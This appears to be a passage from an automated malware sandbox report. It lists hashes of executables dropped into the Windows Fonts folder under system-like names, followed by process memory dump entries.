\??\c:\windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\??\c:\windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
memory/232-153-0x0000000000000000-mapping.dmp
-
memory/236-205-0x0000000000000000-mapping.dmp
-
memory/520-134-0x0000000000000000-mapping.dmp
-
memory/564-190-0x0000000000000000-mapping.dmp
-
memory/1044-230-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1044-220-0x0000000000000000-mapping.dmp
-
memory/1088-201-0x0000000000000000-mapping.dmp
-
memory/1188-200-0x0000000000000000-mapping.dmp
-
memory/1216-139-0x0000000000000000-mapping.dmp
-
memory/1340-141-0x0000000000000000-mapping.dmp
-
memory/1528-179-0x0000000000000000-mapping.dmp
-
memory/1644-154-0x0000000000000000-mapping.dmp
-
memory/1744-144-0x0000000000000000-mapping.dmp
-
memory/1764-227-0x0000000000000000-mapping.dmp
-
memory/1764-236-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1764-161-0x0000000000000000-mapping.dmp
-
memory/1764-175-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2088-137-0x0000000000000000-mapping.dmp
-
memory/2164-210-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2164-164-0x0000000000000000-mapping.dmp
-
memory/2164-181-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2212-197-0x0000000000000000-mapping.dmp
-
memory/2348-165-0x0000000000000000-mapping.dmp
-
memory/2464-203-0x0000000000000000-mapping.dmp
-
memory/2536-150-0x0000000000000000-mapping.dmp
-
memory/2640-238-0x0000027062C60000-0x0000027062CA0000-memory.dmpFilesize
256KB
-
memory/2640-235-0x0000027062B10000-0x0000027062B30000-memory.dmpFilesize
128KB
-
memory/2664-173-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2664-159-0x0000000000000000-mapping.dmp
-
memory/2712-147-0x0000000000000000-mapping.dmp
-
memory/2716-149-0x0000000000000000-mapping.dmp
-
memory/2748-146-0x0000000000000000-mapping.dmp
-
memory/2888-214-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2888-206-0x0000000000000000-mapping.dmp
-
memory/3036-195-0x0000000000000000-mapping.dmp
-
memory/3132-160-0x0000000000000000-mapping.dmp
-
memory/3380-219-0x0000000000000000-mapping.dmp
-
memory/3392-138-0x0000000000000000-mapping.dmp
-
memory/3404-217-0x0000000000000000-mapping.dmp
-
memory/3460-132-0x0000000000400000-0x0000000000809000-memory.dmpFilesize
4.0MB
-
memory/3460-186-0x0000000000400000-0x0000000000809000-memory.dmpFilesize
4.0MB
-
memory/3520-133-0x0000000000000000-mapping.dmp
-
memory/3540-157-0x0000000000000000-mapping.dmp
-
memory/3540-172-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3544-211-0x0000000000000000-mapping.dmp
-
memory/3544-218-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3544-225-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3568-240-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3568-180-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3676-239-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3676-213-0x0000000000000000-mapping.dmp
-
memory/3692-156-0x0000000000000000-mapping.dmp
-
memory/3744-170-0x0000000000000000-mapping.dmp
-
memory/3756-202-0x0000000000000000-mapping.dmp
-
memory/3808-142-0x0000000000000000-mapping.dmp
-
memory/3904-185-0x0000000000000000-mapping.dmp
-
memory/3936-152-0x0000000000000000-mapping.dmp
-
memory/4056-178-0x0000000000000000-mapping.dmp
-
memory/4072-182-0x0000000000000000-mapping.dmp
-
memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/4092-191-0x0000000000000000-mapping.dmp
-
memory/4128-237-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4128-242-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4184-140-0x0000000000000000-mapping.dmp
-
memory/4248-135-0x0000000000000000-mapping.dmp
-
memory/4328-199-0x0000000000000000-mapping.dmp
-
memory/4440-231-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4440-221-0x0000000000000000-mapping.dmp
-
memory/4572-204-0x0000000000000000-mapping.dmp
-
memory/4584-136-0x0000000000000000-mapping.dmp
-
memory/4688-155-0x0000000000000000-mapping.dmp
-
memory/4720-188-0x0000000000000000-mapping.dmp
-
memory/4764-145-0x0000000000000000-mapping.dmp
-
memory/4840-193-0x0000000000000000-mapping.dmp
-
memory/4844-189-0x0000000000000000-mapping.dmp
-
memory/4848-169-0x0000000000000000-mapping.dmp
-
memory/4848-176-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4900-194-0x0000000000000000-mapping.dmp
-
memory/4920-198-0x0000000000000000-mapping.dmp
-
memory/4928-192-0x0000000000000000-mapping.dmp
-
memory/4948-143-0x0000000000000000-mapping.dmp
-
memory/4984-167-0x0000000000000000-mapping.dmp
-
memory/4996-233-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4996-224-0x0000000000000000-mapping.dmp
-
memory/5024-148-0x0000000000000000-mapping.dmp
-
memory/5056-151-0x0000000000000000-mapping.dmp
-
memory/5100-207-0x0000000000000000-mapping.dmp
-
memory/5100-215-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB